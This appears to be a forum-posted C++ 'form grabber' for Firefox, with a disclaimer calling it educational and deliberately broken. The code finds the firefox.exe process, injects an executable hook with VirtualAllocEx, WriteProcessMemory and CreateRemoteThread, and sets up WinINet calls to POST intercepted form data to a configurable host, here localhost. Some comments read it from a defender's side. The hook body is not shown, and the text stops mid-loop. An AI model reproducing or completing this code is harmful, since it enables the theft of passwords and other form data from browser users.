/*Ok, so firstly I created this purely for educational reasons. To prevent any Feds attempting to have an early morning party v& dance, this code will not work. (You could make it work by changing 4 lines)
If you get this working, use it maliciously and get arrested, don't come crying to me.
Now that's out of the way, here is the form grabber. Blackhats commonly use scripts similar to this to "grab" details from websites you visit. It's a simple c++ script that can run on admin or lower rights accounts.
Remember this script is BROKEN. Firefox "patched" this method.*/
- #include <stdio.h>
- #include <windows.h>
- #include <string.h>
- #include <Tlhelp32.h>
- #include <wininet.h>
- #include <tchar.h>
/*
 * Constants and function-pointer types shared by the injector (main) and the
 * injected Hook() body.
 *
 * Reading this defensively: everything an analyst needs to characterise the
 * sample is a plain-text constant here -- the POST target ("localhost",
 * "/postDemo.php"), the module/export being hooked ("nspr4.dll"/"PR_Write")
 * and the process name ("firefox.exe"). As written the target host is the
 * local machine, and the header comment above states that Firefox has since
 * closed this hooking path.
 */
#define HTTP_PORT 80
#define HTTP_POST "POST"
#define HTTP_POST_HEADER "Content-Type:application/x-www-form-urlencoded"
#define HTTP_REMOTE_SITE "localhost"
#define HTTP_REMOTE_PAGE "/postDemo.php"
#define FIREFOX_PROCESS TEXT("firefox.exe")
#define FIREFOX_PR_WRITE "PR_Write"
#define NSPR4_DLL "nspr4.dll"
#define WININET_DLL "wininet.dll"
#define KERNEL32_DLL "kernel32.dll"
/* Number of bytes of Hook() that main() copies verbatim into a
 * PAGE_EXECUTE_READWRITE allocation in the target; an RWX region of this
 * size created from another process is itself a common detection signal. */
#define HOOK_CODE_SIZE 2000
/* Stack/instruction-layout offsets used by the hook; their exact meaning
 * depends on Hook(), whose body is not in this view. */
#define HOOK_ESP_DATA_OFFSET 0x08
#define HOOK_ESP_DATA_SIZE 0x0C
#define HOOK_ESP_ARG_0 0x04
#define HOOK_POST_CMP 0x54534F50 // = TSOP (POST) -- the bytes "POST" read as one little-endian DWORD
#define HOOK_JMP 0xE9 // Jump near, relative, displacement relative to next instruction
#define HOOK_INT3 0xCC
#define HOOK_JMP_INST_SIZE 0x01
#define HOOK_INT3_SIZE 0x01
#define HOOK_ADDRESS_SIZE_32 0x04
#define HOOK_ADDRESS_SIZE_64 0x08
#define HOOK_REL_JMP_OFFSET_32 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_32) // 5
#define HOOK_REL_JMP_OFFSET_64 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_64) // 9
#define HOOK_PARAM1_OFFSET_32 0x08
#define HOOK_LOCALVAR1_OFFSET_32 0x04 // Should be
#define PR_WRITE_JMP_VP_SIZE 0x06 // 0x0A for 64 bits
/* Signatures of the kernel32/wininet exports that main() resolves at run time
 * with GetProcAddress and stores in InjectData -- presumably so the copied
 * hook body needs no import-table entries of its own. Note these are the
 * ANSI ("...A") variants, matching the names main() looks up. */
typedef HMODULE (WINAPI *FnGetModuleHandle) (LPCTSTR);
typedef FARPROC (WINAPI *FnGetProcAddress) (HMODULE,LPCSTR);
typedef int (WINAPI *FnVirtualProtect) (LPVOID,SIZE_T,DWORD,PDWORD);
typedef HINTERNET (WINAPI *FnInternetOpen) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
typedef HINTERNET (WINAPI *FnInternetConnect)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
typedef HINTERNET (WINAPI *FnHttpOpenRequest) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
typedef BOOL (WINAPI *FnHttpSendRequest)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
typedef VOID (WINAPI *FnSleep)(DWORD);
/*
 * Argument block for the remote Hook() thread. main() fills it in, writes a
 * copy into the target with WriteProcessMemory, and passes that copy's
 * address as the CreateRemoteThread parameter. Hook() itself is not in this
 * view, so which fields it reads or writes cannot be confirmed here; the
 * per-field notes below only say what the visible part of main() does.
 *
 * Defensive note: the block is written as plain bytes, so the strings below
 * ("nspr4.dll", "PR_Write", the POST header, host and page) sit unobfuscated
 * both in the injector binary and in the target's memory, which makes them
 * straightforward indicators for memory scanning and static rules.
 */
typedef struct {
    FnGetModuleHandle fnGetModuleHandle; // GetModuleHandleA, resolved from kernel32 in main()
    FnGetProcAddress fnGetProcAddress; // GetProcAddress
    FnVirtualProtect fnVirtualProtect; // VirtualProtect
    FnSleep fnSleep; // Sleep
    char nameNspr4[36]; // NSPR4_DLL ("nspr4.dll")
    char namePR_Write[36]; // FIREFOX_PR_WRITE ("PR_Write")
    BYTE *PR_Write; // not set in the visible part of main(); presumably filled in by Hook()
    BYTE *nptr; // not set in the visible part of main(); presumably used by Hook()
    DWORD *bptr; // likewise
    DWORD oldProtectValue; // likewise; the name suggests the VirtualProtect out-parameter
    char blank[3]; // ""
    char remoteSite[16]; // HTTP_REMOTE_SITE ("localhost")
    char post[10]; // HTTP_POST ("POST")
    char pageName[16]; // HTTP_REMOTE_PAGE ("/postDemo.php", 14 bytes with NUL; the earlier "/visit.php" note was stale)
    char header[64]; // HTTP_POST_HEADER (47 bytes with NUL)
    HINTERNET fnOpenHandle; // not set in the visible part of main()
    HINTERNET fnConnectHandle; // likewise
    HINTERNET internetHandle; // likewise
    int postDataLength; // likewise
    char *pPostData; // likewise
    FnInternetOpen fnInternetOpen; // InternetOpenA, resolved from wininet in main()
    FnInternetConnect fnInternetConnect; // InternetConnectA
    FnHttpOpenRequest fnHttpOpenRequest; // HttpOpenRequestA
    FnHttpSendRequest fnHttpSendRequest; // HttpSendRequestA
    int addressSize; // 4, or 8 on 64 bit CPUs -- taken from sizeof(BYTE *) in the injector, i.e. the injector's own pointer width
} InjectData;
/* Body of the remote thread. main() copies HOOK_CODE_SIZE bytes starting at
 * this address into the target, which only works if the function is fully
 * self-contained and reaches everything it needs through pData. Its
 * definition is not in this view. */
void Hook(InjectData *pData);
- int main() {
- InjectData data;
- LPVOID pRemoteProgram, pRemoteMemory;
- HANDLE rThread;
- HMODULE kernel32;
- HMODULE wininet;
- HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
- PROCESSENTRY32 ProcessInfo;
- ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
- LoadLibraryA( WININET_DLL );
- wininet = GetModuleHandleA( WININET_DLL );
- kernel32 = GetModuleHandleA( KERNEL32_DLL );
- data.fnGetModuleHandle = (FnGetModuleHandle) GetProcAddress( kernel32,"GetModuleHandleA" );
- data.fnGetProcAddress = (FnGetProcAddress) GetProcAddress( kernel32, "GetProcAddress" );
- data.fnVirtualProtect = (FnVirtualProtect) GetProcAddress( kernel32, "VirtualProtect" );
- data.fnSleep = (FnSleep) GetProcAddress( kernel32, "Sleep" );
- data.fnInternetOpen = (FnInternetOpen) GetProcAddress( wininet, "InternetOpenA" );
- data.fnInternetConnect = (FnInternetConnect) GetProcAddress( wininet, "InternetConnectA" );
- data.fnHttpOpenRequest = (FnHttpOpenRequest) GetProcAddress( wininet, "HttpOpenRequestA" );
- data.fnHttpSendRequest = (FnHttpSendRequest) GetProcAddress( wininet, "HttpSendRequestA" );
- strcpy( data.nameNspr4, NSPR4_DLL );
- strcpy( data.namePR_Write, FIREFOX_PR_WRITE );
- strcpy( data.remoteSite, HTTP_REMOTE_SITE );
- strcpy( data.post, HTTP_POST );
- strcpy( data.pageName, HTTP_REMOTE_PAGE);
- strcpy( data.header, HTTP_POST_HEADER );
- strcpy( data.blank, "");
- data.addressSize = sizeof( BYTE * ); // size of a pointer
- while(Process32Next(handle, &ProcessInfo))
- {
- // strcmp on ANSI, wcscmp on UNICODE
- if(! _tcscmp(ProcessInfo.szExeFile, FIREFOX_PROCESS))
- {
- HANDLE firefoxHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
- pRemoteMemory = VirtualAllocEx( firefoxHandle, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
- WriteProcessMemory(firefoxHandle, pRemoteMemory, &data, sizeof(data), NULL);
- pRemoteProgram = VirtualAllocEx( firefoxHandle, NULL, HOOK_CODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
- WriteProcessMemory(firefoxHandle, pRemoteProgram, Hook, HOOK_CODE_SIZE, NULL);
- rThread = CreateRemoteThread( firefoxHandle, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteProgram, pRemoteMemory, 0 ,NULL);
- WaitForSingleObject( rThread, INFINITE);
- CloseHandle(firefoxHandle);
- }